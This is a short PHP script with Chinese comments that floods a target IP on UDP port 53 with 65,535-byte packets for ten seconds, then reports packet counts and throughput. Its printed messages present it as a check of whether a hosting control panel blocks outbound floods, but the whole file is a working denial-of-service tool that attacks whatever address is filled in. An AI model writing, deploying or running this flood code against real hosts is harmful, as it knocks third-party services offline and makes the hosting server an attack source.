<?php 
$packets = 0; 
$ip = "123.123.123.123"; //目标IP
$rand = "53"; //目标端口,
set_time_limit(0); 
ignore_user_abort(FALSE); 
$exec_time = 10; //攻击时间10秒
$time = time(); 
print "准备发送攻击包：Flooded: $ip on port $rand ，如果本页面马上就中止而且没有拦截失败的提示，就表明拦截功能生效了:<br><br>"; 
$max_time = $time+$exec_time; 
for($i=0;$i<65535;$i++){ 
$out .= "X"; 
} 
while(1){ 
$packets++; 
if(time() > $max_time){ 
break; 
} 
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); 
if($fp){ 
fwrite($fp, $out); 
fclose($fp); 
} 
} 
echo "发包完成： ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) 平均每秒 ". round($packets/$exec_time, 2) . " packets/s \n"; 
print "<br><font color=red>没有拦截攻击，拦截失败！拦截功能无效(----注意只有装了星外受控这个功能才有用！！！！) </font><br><br>";
?> 